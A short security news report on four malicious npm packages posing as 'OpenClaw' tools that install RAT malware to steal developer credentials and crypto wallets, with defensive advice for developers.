Researchers uncovered four malicious npm packages delivering RAT malware that steals crypto wallets and developer credentials.
Cybersecurity researchers have uncovered four malicious npm packages designed to infect developer systems with remote access trojan (RAT) malware capable of stealing browser data, cryptocurrency wallets, and cloud credentials.
The malicious packages were disguised as tools related to the open-source project “OpenClaw” and distributed through the npm registry as part of an ongoing software supply chain attack targeting developers and DevOps environments. Researchers said the campaign used multi-stage payloads to quietly deploy malware onto compromised systems.
According to findings published in May 2026, the malicious packages downloaded hidden second-stage malware capable of harvesting browser-stored credentials, macOS Keychain data, cryptocurrency wallet information, SSH keys, API tokens, and cloud authentication secrets. The malware also targeted developer-focused platforms and CI/CD infrastructure.
Researchers warned that the malware demonstrated similarities to broader “Shai-Hulud”-style supply chain campaigns previously seen targeting npm and PyPI ecosystems. Those attacks focused heavily on stealing GitHub tokens and developer publishing credentials in order to spread malicious packages further across software repositories.
The discovery comes amid a sharp rise in supply chain attacks targeting open-source ecosystems during 2026. Security firms recently disclosed additional compromises involving widely used npm packages such as Axios, where attackers hijacked maintainer accounts and deployed cross-platform RAT malware affecting Windows, Linux, and macOS systems.
Security researchers said the latest malicious npm packages used post-install scripts and hidden dependency mechanisms to execute malware automatically during installation. In several recent campaigns, attackers also attempted to erase traces of compromise after infecting developer systems.
Experts warned that software supply chain attacks are increasingly targeting developer infrastructure instead of end users directly because compromised developer credentials can provide access to source code repositories, cloud environments, production systems, and downstream software distributions used by millions of users.
Researchers advised developers to immediately remove the malicious packages, rotate all potentially exposed credentials, audit CI/CD pipelines, and review npm dependencies for unauthorized modifications or suspicious post-install behavior.
Related articles :
- ZeroDayRAT Mobile Spyware Steals Data, Enables Surveillance
- Commvault Integrates CloudSEK to Detect Dark Web Leaks
- Quasar Linux RAT Targets Developers, Steals Keys
Reports are sourced from official documents, law-enforcement updates, and credible investigations.
Discover additional reports, market trends, crime analysis and Harm Reduction articles on DarkDotWeb to stay informed about the latest dark web operations.
